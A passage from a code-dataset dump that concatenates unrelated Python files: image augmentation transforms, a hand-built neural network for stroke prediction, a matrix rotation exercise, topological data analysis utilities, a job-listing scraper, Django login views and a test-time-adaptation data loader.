try again if not\n if not mask.any():\n continue\n\n # take only matching gt boxes\n current_boxes = bboxes[mask, :].copy()\n # cut the crop from the image\n current_img = img.crop((left, top, left + w, top + h))\n # take only matching gt labels\n current_labels = labels[mask]\n # should we use the box left and top corner or the crop's\n current_boxes[:, :2] = np.maximum(current_boxes[:, :2], rect[:2])\n # adjust to crop (by subtracting crop's left,top)\n current_boxes[:, :2] -= rect[:2]\n current_boxes[:, 2:] = np.minimum(current_boxes[:, 2:], rect[2:])\n # adjust to crop (by subtracting crop's left,top)\n current_boxes[:, 2:] -= rect[:2]\n return current_img, labelmap, maskmap, kpts, current_boxes, current_labels, polygons\n\n\nclass Resize(object):\n def __init__(self, target_size=None, min_side_length=None, max_side_length=None):\n self.target_size = target_size\n self.min_side_length = min_side_length\n self.max_side_length = max_side_length\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n # width, height = img.size\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if self.target_size is not None:\n w_scale_ratio = self.target_size[0] / width\n h_scale_ratio = self.target_size[1] / height\n\n elif self.min_side_length is not None and self.max_side_length is None:\n scale_ratio = self.min_side_length / min(width, height)\n w_scale_ratio, h_scale_ratio = scale_ratio, scale_ratio\n\n elif self.min_side_length is None and self.max_side_length is not None:\n scale_ratio = self.max_side_length / max(width, height)\n w_scale_ratio, h_scale_ratio = scale_ratio, scale_ratio\n\n else:\n scale1 = self.min_side_length / min(width, height)\n scale2 = self.max_side_length / max(width, height)\n w_scale_ratio, h_scale_ratio = min(scale1, scale2), min(scale1, scale2)\n\n target_size = [int(round(width * w_scale_ratio)), int(round(height * h_scale_ratio))]\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] *= w_scale_ratio\n kpts[:, :, 1] *= h_scale_ratio\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] *= w_scale_ratio\n bboxes[:, 1::2] *= h_scale_ratio\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] *= w_scale_ratio\n polygons[object_id][polygon_id][1::2] *= h_scale_ratio\n\n if not isinstance(img, list):\n img = img.resize(target_size, Image.BILINEAR)\n else:\n img = [item.resize(target_size, Image.BILINEAR) for item in img]\n if labelmap is not None:\n labelmap = labelmap.resize(target_size, Image.NEAREST)\n\n if maskmap is not None:\n maskmap = maskmap.resize(target_size, Image.NEAREST)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nPIL_AUGMENTATIONS_DICT = {\n 'random_saturation': RandomSaturation,\n 'random_hue': RandomHue,\n 'random_perm': RandomPerm,\n 'random_contrast': RandomContrast,\n 'random_brightness': RandomBrightness,\n 'random_gauss_blur': RandomGaussBlur,\n 'random_hsv': RandomHSV,\n 'random_pad': RandomPad,\n 'random_border': RandomBorder,\n 'random_hflip': RandomHFlip,\n 'random_resize': RandomResize,\n 'random_crop': RandomCrop,\n 'random_focus_crop': RandomFocusCrop,\n 'random_det_crop': RandomDetCrop,\n 'random_resized_crop': RandomResizedCrop,\n 
'random_rotate': RandomRotate,\n 'resize': Resize\n}\n\n\nclass PILAugCompose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n configer: configuration object holding the 'aug_trans' settings.\n split (str): dataset split whose transform sequence should be used.\n\n Example:\n >>> PILAugCompose(configer, split='train')\n \"\"\"\n def __init__(self, configer, split='train'):\n self.configer = configer\n self.transforms = dict()\n self.split = split\n self.trans_dict = self.configer.get(split, 'aug_trans')\n shuffle_train_trans = []\n if 'shuffle_trans_seq' in self.trans_dict:\n if isinstance(self.trans_dict['shuffle_trans_seq'][0], list):\n train_trans_seq_list = self.trans_dict['shuffle_trans_seq']\n for train_trans_seq in train_trans_seq_list:\n shuffle_train_trans += train_trans_seq\n\n else:\n shuffle_train_trans = self.trans_dict['shuffle_trans_seq']\n\n for trans in self.trans_dict['trans_seq'] + shuffle_train_trans:\n if 'func' in self.trans_dict[trans]:\n self.transforms[trans] = PIL_AUGMENTATIONS_DICT[self.trans_dict[trans]['func']](**self.trans_dict[trans]['params'])\n else:\n self.transforms[trans] = PIL_AUGMENTATIONS_DICT[trans](**self.trans_dict[trans])\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert self.configer.get('data', 'input_mode') == 'RGB'\n shuffle_trans_seq = []\n if 'shuffle_trans_seq' in self.trans_dict:\n if isinstance(self.trans_dict['shuffle_trans_seq'][0], list):\n # pick one candidate sequence; random.choice avoids the IndexError of\n # random.randint(0, len(...)), whose upper bound is inclusive\n shuffle_trans_seq = random.choice(self.trans_dict['shuffle_trans_seq'])\n else:\n shuffle_trans_seq = self.trans_dict['shuffle_trans_seq']\n random.shuffle(shuffle_trans_seq)\n\n for trans_key in (shuffle_trans_seq + self.trans_dict['trans_seq']):\n (img, labelmap, maskmap, kpts,\n bboxes, labels, polygons) = self.transforms[trans_key](img, labelmap, maskmap,\n kpts, bboxes, labels, polygons)\n\n out_list = [img]\n for elem in [labelmap, maskmap, kpts, bboxes, labels, polygons]:\n if elem is not None:\n out_list.append(elem)\n\n return out_list if len(out_list) > 1 else out_list[0]\n","repo_name":"donnyyou/torchcv","sub_path":"lib/data/pil_aug_transforms.py","file_name":"pil_aug_transforms.py","file_ext":"py","file_size_in_byte":52510,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"} +{"seq_id":"5605314794","text":"from __future__ import print_function\n\nfrom abc import abstractmethod\nimport math\nimport random\nimport copy\nfrom numpy.core.numeric import NaN\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nimport os.path\nfrom os import path\nimport imblearn.over_sampling as RandomOverSampling\nfrom sklearn import preprocessing\n\n\nclass ComputationalNode(object):\n\n @abstractmethod\n def forward(self, x): # x is an array of scalars\n pass\n\n @abstractmethod\n def backward(self, dz): # dz is a scalar\n pass\n\n\nclass MultiplyNode(ComputationalNode):\n\n def __init__(self):\n self.x = [0., 0.] # x[0] is input, x[1] is weight\n\n def forward(self, x):\n self.x = x\n return self.x[0] * self.x[1]\n\n def backward(self, dz):\n return [dz * self.x[1], dz * self.x[0]]
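\n\n # (Added check, not in the original file; values are illustrative.) For z = x*w the\n # chain rule gives dz/dx = w and dz/dw = x, which is exactly what backward() returns,\n # scaled by the upstream gradient:\n # node = MultiplyNode()\n # node.forward([3.0, 2.0]) # z = 6.0\n # assert node.backward(1.0) == [2.0, 3.0] # [dz/dx, dz/dw]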
\n\n\nclass SumNode(ComputationalNode):\n\n def __init__(self):\n self.x = [] # x is an array of inputs\n\n def forward(self, x):\n self.x = x\n return sum(self.x)\n\n def backward(self, dz):\n return [dz for xx in self.x]\n\n\nclass SigmoidNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._sigmoid(self.x)\n\n def backward(self, dz):\n return dz * self._sigmoid(self.x) * (1. - self._sigmoid(self.x))\n\n def _sigmoid(self, x):\n return 1. / (1. + math.exp(-x))\n\n\nclass TanhNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._tanh(self.x)\n\n def backward(self, dz):\n return dz * (1. - (self._tanh(self.x))**2)\n\n def _tanh(self, x):\n # math.tanh is numerically safe for large |x|, unlike the explicit\n # (e^x - e^-x) / (e^x + e^-x) formula, which overflows\n return math.tanh(x)\n\n\nclass ReluNode(ComputationalNode):\n\n def __init__(self):\n self.x = 0. # x is an input\n\n def forward(self, x):\n self.x = x\n return self._relu(self.x)\n\n def backward(self, dz):\n return dz * (1. if self.x > 0. else 0.)\n\n def _relu(self, x):\n return max(0., x)\n\n\nclass NeuronNode(ComputationalNode):\n\n def __init__(self, n_inputs, activation):\n self.n_inputs = n_inputs\n self.multiply_nodes = [] # for inputs and weights\n self.sum_node = SumNode() # for sum of inputs*weights\n\n for n in range(n_inputs): # collect inputs and corresponding weights\n mn = MultiplyNode()\n mn.x = [1., random.gauss(0., 0.1)] # init input weights\n self.multiply_nodes.append(mn)\n\n mn = MultiplyNode() # init bias node\n mn.x = [1., random.gauss(0., 0.01)] # init bias weight\n self.multiply_nodes.append(mn)\n\n if activation == 'sigmoid':\n self.activation_node = SigmoidNode()\n elif activation == 'relu':\n self.activation_node = ReluNode()\n elif activation == \"tanh\":\n self.activation_node = TanhNode()\n else:\n raise RuntimeError(\n 'Unknown activation function \"{0}\".'.format(activation))\n\n self.previous_deltas = [0.] * (self.n_inputs + 1)\n self.gradients = []\n\n def forward(self, x): # x is a vector of inputs\n x = copy.copy(x)\n x.append(1.) 
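# (added note) the constant 1.0 appended above is the usual bias trick: the bias\n # becomes an ordinary weight attached to a fixed input, handled by the extra\n # MultiplyNode created in __init__\n 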
# for bias\n\n for_sum = []\n for i, xx in enumerate(x):\n inp = [x[i], self.multiply_nodes[i].x[1]]\n for_sum.append(self.multiply_nodes[i].forward(inp))\n\n summed = self.sum_node.forward(for_sum)\n summed_act = self.activation_node.forward(summed)\n return summed_act\n\n def backward(self, dz):\n dw = []\n dx = []\n b = dz[0] if type(dz[0]) == float else sum(dz)\n\n b = self.activation_node.backward(b)\n b = self.sum_node.backward(b)\n for i, bb in enumerate(b):\n dw.append(self.multiply_nodes[i].backward(bb)[1])\n dx.append(self.multiply_nodes[i].backward(bb)[0])\n\n self.gradients = dw\n return dx\n\n def update_weights(self, learning_rate, momentum):\n for i, multiply_node in enumerate(self.multiply_nodes):\n mean_gradient = self.gradients[i]\n delta = learning_rate*mean_gradient + \\\n momentum*self.previous_deltas[i]\n self.previous_deltas[i] = delta\n self.multiply_nodes[i].x[1] -= delta\n\n self.gradients = []\n\n\nclass NeuralLayer(ComputationalNode):\n\n def __init__(self, n_inputs, n_neurons, activation):\n self.n_inputs = n_inputs\n self.n_neurons = n_neurons\n self.activation = activation\n\n self.neurons = []\n # construct layer\n for _ in range(n_neurons):\n neuron = NeuronNode(n_inputs, activation)\n self.neurons.append(neuron)\n\n def forward(self, x): # x is a vector of \"n_inputs\" elements\n layer_output = []\n for neuron in self.neurons:\n neuron_output = neuron.forward(x)\n layer_output.append(neuron_output)\n\n return layer_output\n\n def backward(self, dz): # dz is a vector of \"n_neurons\" elements\n b = []\n for idx, neuron in enumerate(self.neurons):\n neuron_dz = [d[idx] for d in dz]\n neuron_dz = neuron.backward(neuron_dz)\n b.append(neuron_dz[:-1])\n\n return b # b is a vector of \"n_neurons\" elements\n\n def update_weights(self, learning_rate, momentum):\n for neuron in self.neurons:\n neuron.update_weights(learning_rate, momentum)\n\n\nclass NeuralNetwork(ComputationalNode):\n\n def __init__(self):\n # construct neural network\n self.layers = []\n\n def add(self, layer):\n self.layers.append(layer)\n\n def forward(self, x): # x is a vector which is an input for neural net\n prev_layer_output = None\n for idx, layer in enumerate(self.layers):\n if idx == 0: # input layer\n prev_layer_output = layer.forward(x)\n else:\n prev_layer_output = layer.forward(prev_layer_output)\n\n return prev_layer_output # actually an output from last layer\n\n def backward(self, dz):\n next_layer_dz = None\n for idx, layer in enumerate(self.layers[::-1]):\n if idx == 0:\n next_layer_dz = layer.backward(dz)\n else:\n next_layer_dz = layer.backward(next_layer_dz)\n\n return next_layer_dz\n\n def update_weights(self, learning_rate, momentum):\n for layer in self.layers:\n layer.update_weights(learning_rate, momentum)\n\n def fit(self, X, Y, learning_rate, momentum, nb_epochs, shuffle=False, verbose=0):\n assert len(X) == len(Y)\n\n hist = []\n for epoch in range(nb_epochs):\n if shuffle:\n random.seed(epoch)\n random.shuffle(X)\n random.seed(epoch)\n random.shuffle(Y)\n\n total_loss = 0.0\n for x, y in zip(X, Y):\n # forward pass to compute output\n pred = self.forward(x)\n # compute loss\n grad = 0.0\n for o, t in zip(pred, y):\n total_loss += (t - o) ** 2.\n grad += -(t - o)\n # backward pass to compute gradients\n self.backward([[grad]])\n # update weights with computed gradients\n self.update_weights(learning_rate, momentum)\n\n hist.append(total_loss)\n if verbose == 1:\n print('Epoch {0}: loss {1}'.format(epoch + 1, total_loss))\n print('Loss: {0}'.format(total_loss))\n 
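# (added note) for squared error L = (t - o)**2 the exact gradient is\n # dL/do = -2*(t - o); the loop above uses -(t - o) and lets the learning\n # rate absorb the constant factor, which does not change the optimum\n\n 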
return hist\n\n def predict(self, x):\n return self.forward(x)\n\n\ndef normalize(data):\n x_min = min(data)\n x_max = max(data)\n retval = []\n for x in data:\n retval.append((x-x_min)/(x_max-x_min))\n return retval\n\ndef explore(X,Y):\n encodx = pd.get_dummies(X)\n types = encodx.columns.values\n sumlist = []\n for i in types:\n sum = 0\n # Count how many 1s in this encoded column co-occur with a 1 on the output\n for s in zip(Y.values, encodx[i].values):\n if s[0] == 1 and s[1] == 1:\n sum += 1\n sumlist.append(sum)\n x_pos = [i for i, _ in enumerate(types)]\n pyplot.style.use('ggplot')\n pyplot.bar(x_pos, sumlist)\n pyplot.xticks(x_pos, types)\n pyplot.show()\n\ndef oversample(data):\n max_size = data['stroke'].value_counts().max()\n lst = [data]\n for class_index, group in data.groupby('stroke'):\n lst.append(group.sample(max_size-len(group), replace=True))\n frame_new = pd.concat(lst)\n return frame_new\n\nif __name__ == '__main__':\n \n\n data = pd.read_csv(\n \"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\dataset.csv\")\n \n data.dropna(inplace=True) #Remove NaN rows\n #Oversampling\n #print(data['stroke'].value_counts())\n data=oversample(data)\n #print(data['stroke'].value_counts())\n explore(data.ever_married,data.stroke)\n genderdata = pd.get_dummies(data.gender) #Gender OneHotEncoding data\n work_type_encoded = pd.get_dummies(data.work_type) #WorkType OneHotEncoding data\n smoking_status_encoded = pd.get_dummies(data.smoking_status) #SmokingStatus OneHotEncoding data\n ever_married_data = data['ever_married'].replace({'Yes': 1, 'No': 0}, inplace=False)\n Y = data['stroke'].values\n #DataNormalization\n age_data_normalized = normalize(data.age.values)\n avg_glucose_level_normalized = normalize(data.avg_glucose_level.values)\n bmi_data_normalized = normalize(data.bmi.values)\n #Create input data\n X = list(zip(data.heart_disease, age_data_normalized, data.hypertension, avg_glucose_level_normalized, bmi_data_normalized,\n ever_married_data.values,\n work_type_encoded.Govt_job, work_type_encoded.Never_worked, work_type_encoded.Private, work_type_encoded['Self-employed'].values,\n work_type_encoded.children,\n smoking_status_encoded['Unknown'].values, smoking_status_encoded['formerly smoked'].values, smoking_status_encoded['never smoked'].values, \n smoking_status_encoded['smokes'].values))\n \n # Oversampling because of the small number of True outputs\n #oversample = RandomOverSampling.RandomOverSampler(sampling_strategy=0.5)\n #X_over, Y_over = oversample.fit_resample(X, Y)\n\n # Split the dataset into train/test (70/30)\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.3, random_state=100)\n \n # Training inputs/outputs\n X_trainn = [list(d) for d in X_train]\n y_trainn = [[float(s)] for s in y_train]\n # Test inputs/outputs\n X_testt = [list(d) for d in X_test]\n y_testt = [[float(s)] for s in y_test]\n #print(f\"Training target statistics: {Counter(y_train)}\")\n #print(f\"Testing target statistics: {Counter(y_test)}\")\n\n if(path.exists(\"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\")):\n nn = pickle.load(open(\n \"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\", \"rb\"))\n else:\n nn = NeuralNetwork()\n nn.add(NeuralLayer(15, 18, 'sigmoid'))\n nn.add(NeuralLayer(18, 10, 'tanh'))\n nn.add(NeuralLayer(10, 1, 'sigmoid'))\n history = nn.fit(X_trainn, y_trainn, learning_rate=0.1,\n momentum=0.3, nb_epochs=100, shuffle=True, verbose=1)\n pyplot.plot(history)\n pyplot.show()\n pickle.dump(nn, open(\"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\", \"wb\"))
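\n # (added note) pickle.dump(nn, open(path, \"wb\")) leaves closing the file to the\n # garbage collector; a context manager is the safer idiom, e.g.:\n # with open(model_path, \"wb\") as f: # model_path is an illustrative name\n # pickle.dump(nn, f)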
open(\"C:\\\\Users\\\\Andrea\\\\Desktop\\\\OneDrive_2021-05-26\\\\Kolokvijum 2\\\\nn.p\", \"wb\"))\n\n true_positiv = 0\n true_negativ = 0\n false_positive = 0\n false_negative = 0\n #testiranje\n for idx, xx in enumerate(X_testt):\n #print(xx)\n #print(y_test[idx])\n p = nn.predict(xx)\n # print(p)\n if y_testt[idx] == [1.0]:\n if p[0] > 0.5:\n true_positiv += 1\n else:\n false_negative += 1\n else: # stvarno je bilo false\n if p[0] < 0.5: # predividnjeno je false\n true_negativ += 1\n else:\n false_positive += 1\n\n print(f\"TP: {true_positiv}\")\n print(f\"TN: {true_negativ}\")\n print(f\"FP: {false_positive}\")\n print(f\"FN: {false_negative}\")\n precision = true_positiv/(true_positiv+false_positive)\n recall = true_positiv/(true_positiv+false_negative)\n print(f\"Precision: {precision}\")\n print(f\"Recall: {recall}\")\n f1score= precision*recall / (precision+recall)\n print(f\"F1 Score: {f1score}\")","repo_name":"aleksandarbrkljac/simple_neural_network_heart_attack","sub_path":"ann_comp_graph.py","file_name":"ann_comp_graph.py","file_ext":"py","file_size_in_byte":12617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33135654341","text":"# Given an N x N image matrix, rotate the image by 90 degrees\n\nimport numpy as np\n\ndef rotate_matrix(matrix):\n N = matrix.shape[0]\n\n # Loop through top, right, bottom, left layer by layer till inner most\n for i in range(N // 2):\n for j in range(i, N-i-1):\n # Intuitive reasoning behind mapping of top -> right -> bottom -> left -> top\n top_i, top_j = i, j\n right_i, right_j = j, N-i-1\n bottom_i, bottom_j = N-i-1, N-j-1\n left_i, left_j = N-j-1, i\n\n # Make use of Python's multiple assignments functionality and update values in place\n matrix[top_i, top_j], matrix[right_i, right_j], matrix[bottom_i, bottom_j], matrix[left_i, left_j] = \\\n matrix[left_i, left_j], matrix[top_i, top_j], matrix[right_i, right_j], matrix[bottom_i, bottom_j]\n\n return matrix\n\nif __name__ == \"__main__\":\n # TEST\n input_matrix = np.arange(1, 122).reshape(11, 11)\n print(\"INPUT:\\n\", input_matrix)\n\n output_matrix = rotate_matrix(input_matrix)\n print(\"OUTPUT\\n\", output_matrix)","repo_name":"utsavtiwary/Cracking-The-Coding-Interview","sub_path":"Chapter_1/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18377905461","text":"import gtda\nfrom gtda.graphs import GraphGeodesicDistance\nfrom gtda.diagrams import PersistenceEntropy,NumberOfPoints,Amplitude\nfrom gtda.homology import VietorisRipsPersistence, SparseRipsPersistence, FlagserPersistence\n\n\ndef computing_PD(cors, homology_dimensions=[0,1]):\n\n # Construct the simplicial complex sequence based on the cors\n # and compute the persistence diagrams\n\n \n # matrix pre-processing\n for i in range(len(cors)):\n cor = cors[i]\n cor = abs(cor)\n cor = np.nan_to_num(cor)\n\n # Since the filtration starts at 0,\n # 1-cor is used as the strength of the functional connectivities\n cor = 1 - cor \n\n # To ensure that the network is symmetric\n for ii in range(cor.shape[0]):\n for jj in range(ii):\n cor[ii, jj] = cor[jj, ii]\n cor[ii, ii] = 0\n cors[i] = cor\n\n # Construct the simplicial complex\n VR = VietorisRipsPersistence(metric=\"precomputed\", homology_dimensions=homology_dimensions)\n\n # Compute the persistence diagrams\n dgms = VR.fit_transform(cors)\n \n return dgms\n\ndef 
\ndef computing_Betti_curve(dgm, delta=0.01, homology_dimension=0.0):\n \n # Compute the Betti curve\n\n # dgm: the persistence diagram to be processed\n # delta: the sampling interval of points on the Betti curve\n # homology_dimension: the dimension of the Betti curve\n \n betti = np.zeros(int(1/delta+1))\n \n # the dgms in a sequence have the same size,\n # so delete the padded topological features first\n if homology_dimension != 0.0:\n dgm = np.unique(dgm, axis=0)\n else:\n betti = betti+1\n \n # Select the persistence pairs with the corresponding dimension\n index = np.where(dgm[:,2] == homology_dimension)\n persistence = dgm[index][:,0:2]\n\n # Compute the Betti curve (use delta rather than a hardcoded 0.01,\n # so the resolution argument actually takes effect)\n for per in persistence:\n b = int(per[0]/delta)\n d = int(per[1]/delta)\n betti[b:d] = betti[b:d]+1\n\n return betti\n","repo_name":"ZJUCAGD/DNN","sub_path":"Functional_Network_Of_DNN/src/Simplicial_complex_model.py","file_name":"Simplicial_complex_model.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8109753305","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom tools import get_position\nfrom datetime import datetime,timedelta\nfirst_url = 'http://guangzhou.jianzhimao.com/dbx_zbx_0/index'\n\n\ndef get_html(url):\n rep = requests.get(url)\n if rep.status_code != 200:\n # message translated from Chinese; the original also called an undefined `log` object\n print(\"URL (%s) is unreachable, status code: %d\" % (url, rep.status_code))\n return None\n html = rep.content\n return html\n\ndef get_urls(page_url):\n \"\"\"\n Fetch the part-time job links and titles on a single page\n :param page_url:\n :return:\n \"\"\"\n jobs_data = []\n\n html = get_html(page_url)\n html = BeautifulSoup(html,\"html.parser\")\n data = html.findAll(\"a\",href = re.compile(r'/job/[0-9a-zA-Z]{16}.html'))\n\n for i in data :\n job_data = {}\n url = \"http://guangzhou.jianzhimao.com\" + i.attrs['href']\n job_data['web_url'] = url\n title = i.attrs[\"title\"]\n job_data['title'] = title\n jobs_data.append(job_data)\n return jobs_data\n\ndef get_all_urls(first_url):\n \"\"\"\n Fetch all job urls and titles\n :param first_url:\n :return:\n \"\"\"\n jobs_data = []\n for i in range(11):\n i += 1\n page_url = first_url + str(i) + \".html\"\n print(page_url)\n jobs_data += get_urls(page_url)\n print(len(jobs_data))\n # for i in jobs_data:\n # print(i)\n return jobs_data\nurl1 = \"http://guangzhou.jianzhimao.com/job/V2c2TUlIRklZL2c9.html\"\nurl2 = \"http://guangzhou.jianzhimao.com/job/UFVBZmF6TVgwakk9.html\"\ndef get_time(html):\n # html = get_html(url)\n html = BeautifulSoup(html,\"html.parser\")\n a = html.findAll(\"span\",{\"class\":\"date right yellow\"})[0].get_text()\n # the literals below match Chinese date words scraped from the page, so they must stay Chinese\n if \"昨天\" in a: # \"yesterday\"\n day = 1\n elif \"前天\" in a: # \"the day before yesterday\"\n day = 2\n elif \"前\" in a: # \"... ago\"\n day = 0\n else:\n day = -1\n date = 0\n if day != -1:\n date = datetime.now().date() - timedelta(days=day)\n return date\n\ndef get_company(url):\n html = get_html(url)\n html = str(BeautifulSoup(html, \"html.parser\"))\n print(html)\n # 发布者 means \"publisher\"; the pattern matches the page's Chinese markup\n company = re.findall(r'(.+)>发布者: (.+)?<(.*)', html)[0][1]\n return company\n# get_time(url1)\n# get_all_urls(first_url)\nget_company(url1)","repo_name":"wususu/part-time-job","sub_path":"fetch/jianzhimao.py","file_name":"jianzhimao.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"33182576090","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth import (\n\tlogin as login_to_site,\n\tlogout as logout_from_site\n)\nfrom django.shortcuts import render_to_response, redirect, RequestContext\nfrom 
django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import update_last_login\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.decorators import method_decorator\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import View\nfrom app.rhea.forms import LoginForm\nimport random\n\nclass LoginView(View):\n\n\t@method_decorator(csrf_protect)\n\tdef get(self, request):\n\n\t\t# Check if user has been authenticated before - if so, redirect him/her to the main site\n\t\tif request.user is not None and request.user.is_authenticated():\n\n\t\t\t# Redirect to specified URL\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': request.user.user_id\n\t\t\t})))\n\n\t\t# Create the login form and render the template\n\t\tbackground = random.randint(1, 2)\n\t\tform = LoginForm()\n\t\treturn render_to_response('rhea/accounts/login.html', context = RequestContext(request, locals()))\n\t@method_decorator(csrf_protect)\n\tdef post(self, request):\n\n\t\t# Check if user has been authenticated before - if so, redirect him/her to the main site\n\t\tif request.user is not None and request.user.is_authenticated():\n\n\t\t\t# Redirect to specified URL\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': request.user.user_id\n\t\t\t})))\n\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid():\n\n\t\t\tuser = form.user\n\t\t\tlogin_to_site(request, user)\n\t\t\tupdate_last_login(None, user = user)\n\n\t\t\treturn redirect(request.GET.get('next', reverse_lazy('user:view', kwargs = {\n\t\t\t\t'user_id': user.user_id\n\t\t\t})))\n\n\t\t# Resend the user to the login form to retry\n\t\tbackground = random.randint(1, 2)\n\t\treturn render_to_response('rhea/accounts/login.html',\n\t\t\tcontext = RequestContext(request, locals()),\n\t\t\tstatus = 401\n\t\t)\nlogin = LoginView.as_view()\n\nclass LogoutView(View):\n\n\t@method_decorator(login_required)\n\t@method_decorator(csrf_protect)\n\tdef get(self, request):\n\n\t\t# Proceed to log out the user\n\t\tlogout_from_site(request)\n\t\treturn redirect(reverse_lazy('accounts:login'))\nlogout = LogoutView.as_view()\n","repo_name":"legua25/project-rhea","sub_path":"app/rhea/views/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73727497972","text":"n, m = map(int, input().split())\r\nconnect = []\r\nfor i in range(n+1):\r\n connect.append([])\r\n\r\nfor i in range(m):\r\n a, b = map(int, input().split())\r\n connect[a].append(b)\r\n connect[b].append(a)\r\n\r\nvisited = [False] * (n+1)\r\nstack = []\r\ncount = 0\r\nfor i in range(1, n+1):\r\n if visited[i] == False:\r\n stack.append(i)\r\n visited[i] = True\r\n while len(stack) > 0:\r\n result = True\r\n for check in connect[stack[-1]]:\r\n if visited[check] == False:\r\n stack.append(check)\r\n visited[check] = True\r\n result = False\r\n break\r\n if result == True:\r\n stack.pop()\r\n count += 1\r\nprint(count)\r\n# for i in range(1, n+1): # 1부터 정점까지 순회\r\n","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/11724_연결요소의갯수.py","file_name":"11724_연결요소의갯수.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30661107282","text":"import os\nimport pickle\n\nimport torch\nimport 
torchvision\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom robustbench.data import load_cifar10c, load_cifar100c\nfrom .CustomCifarC_Dataset import CustomCifarC_Dataset\nfrom .Dataset_Idx import Dataset_Idx\nfrom .DomainNet126 import DomainNet126\nfrom .augmentations import get_augmentation_versions, NCropsTransform\nfrom .augmentations.transforms_memo_cifar import aug_cifar\nfrom .augmentations.transforms_memo_imagenet import aug_imagenet\nfrom .data_list import *\nfrom .selectedRotateImageFolder import SelectedRotateImageFolder\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\ntr_transforms = transforms.Compose([transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n # transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2),\n transforms.ToTensor(),\n normalize])\nte_transforms = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize])\n\n\ndef get_transform(dataset_name, adaptation, num_augment=1):\n \"\"\"\n Get transformation pipeline\n Note that the data normalization is done inside of the model\n :param dataset_name: Name of the dataset\n :param adaptation: Name of the adaptation method\n :return: transforms\n \"\"\"\n if adaptation in {\"adacontrast\", \"plue\"}:\n # adacontrast requires specific transformations\n if dataset_name in {\"cifar10\", \"cifar100\", \"cifar10_c\", \"cifar100_c\"}:\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2-light\", res_size=32,\n crop_size=32)\n elif dataset_name == \"imagenet_c\":\n # note that ImageNet-C is already resized and centre cropped\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2-light\", res_size=224,\n crop_size=224)\n elif dataset_name in {\"domainnet126\"}:\n transform = get_augmentation_versions(aug_versions=\"twss\", aug_type=\"moco-v2\", res_size=256, crop_size=224)\n else:\n # use classical ImageNet transformation procedure\n transform = get_augmentation_versions(aug_versions=\"iwss\", aug_type=\"moco-v2\", res_size=256, crop_size=224)\n elif adaptation == \"memo\":\n original_transform = get_transform(dataset_name, None)\n transform_list = [original_transform]\n if 'cifar' in dataset_name:\n transform_aug = aug_cifar\n transforms_one = transforms.Compose([original_transform, transform_aug])\n else:\n transforms_list = original_transform.transforms[:-1]\n transforms_list.append(aug_imagenet)\n transforms_list.append(normalize)\n transforms_one = transforms.Compose(transforms_list)\n\n for i in range(num_augment):\n transform_list.append(transforms_one)\n transform = NCropsTransform(transform_list)\n\n else:\n # create non-method specific transformation\n if 'cifar' in dataset_name:\n transform = 